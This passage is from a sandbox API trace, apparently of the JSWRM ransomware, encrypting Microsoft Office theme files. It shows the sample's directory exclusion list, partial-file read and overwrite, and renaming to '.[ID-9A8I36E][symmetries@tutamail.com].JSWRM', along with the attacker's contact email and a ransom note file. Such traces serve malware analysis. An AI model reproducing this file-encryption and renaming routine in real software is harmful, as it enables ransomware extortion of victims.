cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ion.thmx", lpUsedDefaultChar=0x0) returned 8 [0100.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0100.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0100.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ion.thmx", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0100.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ion.thmx", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ion.thmx", lpUsedDefaultChar=0x0) returned 8 [0100.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0100.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0100.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0100.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0100.191] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Ion.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\ion.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0100.191] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=1837531) returned 1 [0100.191] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0100.191] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0100.204] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.204] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0100.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.205] CloseHandle (hObject=0x45c) returned 1 [0100.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0100.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0100.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0100.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0100.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0100.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0100.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0100.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0100.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.206] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Ion.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\ion.thmx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Ion.thmx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\ion.thmx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0100.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0100.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0100.207] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3258a1fd, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3258a1fd, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3258a1fd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0100.207] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0100.207] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0100.207] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0100.207] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0100.207] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0100.207] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0100.207] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0100.207] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0100.207] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0100.207] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0100.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0100.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0100.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0100.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0100.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0100.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0100.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0100.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0100.208] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1118806a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1118806a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x111fa76a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f98b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Office Theme.thmx", cAlternateFileName="OFFICE~1.THM")) returned 1 [0100.208] lstrcmpiW (lpString1="Office Theme.thmx", lpString2=".") returned 1 [0100.208] lstrcmpiW (lpString1="Office Theme.thmx", lpString2="..") returned 1 [0100.208] lstrcmpiW (lpString1="Office Theme.thmx", lpString2="...") returned 1 [0100.208] lstrcmpiW (lpString1="Office Theme.thmx", lpString2="windows") returned -1 [0100.208] lstrcmpiW (lpString1="Office Theme.thmx", lpString2="recovery") returned -1 [0100.208] lstrcmpiW (lpString1="Office Theme.thmx", lpString2="perflogs") returned -1 [0100.208] lstrcmpiW (lpString1="Office Theme.thmx", lpString2="documents and settings") returned 1 [0100.208] lstrcmpiW (lpString1="Office Theme.thmx", lpString2="$RECYCLE.BIN") returned 1 [0100.208] lstrcmpiW (lpString1="Office Theme.thmx", lpString2="system volume information") returned -1 [0100.208] lstrcmpiW (lpString1="Office Theme.thmx", lpString2="msocache") returned 1 [0100.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office Theme.thmx", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0100.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office Theme.thmx", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office Theme.thmx", lpUsedDefaultChar=0x0) returned 17 [0100.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office Theme.thmx", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0100.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office Theme.thmx", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office Theme.thmx", lpUsedDefaultChar=0x0) returned 17 [0100.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0100.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0100.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0100.208] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Office Theme.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\office theme.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0100.209] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=326027) returned 1 [0100.209] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0100.209] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0100.279] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.279] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0100.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.280] CloseHandle (hObject=0x45c) returned 1 [0100.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0100.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0100.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0100.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0100.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0100.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0100.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0100.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0100.280] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Office Theme.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\office theme.thmx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Office Theme.thmx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\office theme.thmx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0100.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0100.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0100.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0100.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0100.282] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x111d450b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x111d450b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1132ba98, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x84d621, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Organic.thmx", cAlternateFileName="ORGANI~1.THM")) returned 1 [0100.282] lstrcmpiW (lpString1="Organic.thmx", lpString2=".") returned 1 [0100.282] lstrcmpiW (lpString1="Organic.thmx", lpString2="..") returned 1 [0100.282] lstrcmpiW (lpString1="Organic.thmx", lpString2="...") returned 1 [0100.282] lstrcmpiW (lpString1="Organic.thmx", lpString2="windows") returned -1 [0100.282] lstrcmpiW (lpString1="Organic.thmx", lpString2="recovery") returned -1 [0100.282] lstrcmpiW (lpString1="Organic.thmx", lpString2="perflogs") returned -1 [0100.282] lstrcmpiW (lpString1="Organic.thmx", lpString2="documents and settings") returned 1 [0100.282] lstrcmpiW (lpString1="Organic.thmx", lpString2="$RECYCLE.BIN") returned 1 [0100.282] lstrcmpiW (lpString1="Organic.thmx", lpString2="system volume information") returned -1 [0100.282] lstrcmpiW (lpString1="Organic.thmx", lpString2="msocache") returned 1 [0100.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0100.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Organic.thmx", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Organic.thmx", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Organic.thmx", lpUsedDefaultChar=0x0) returned 12 [0100.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0100.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0100.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Organic.thmx", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Organic.thmx", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Organic.thmx", lpUsedDefaultChar=0x0) returned 12 [0100.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0100.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0100.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0100.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0100.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Organic.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\organic.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0100.283] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=8705569) returned 1 [0100.283] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0100.284] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0100.294] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.294] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0100.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.295] CloseHandle (hObject=0x45c) returned 1 [0100.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0100.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0100.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0100.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0100.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0100.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0100.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.295] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Organic.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\organic.thmx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Organic.thmx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\organic.thmx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) 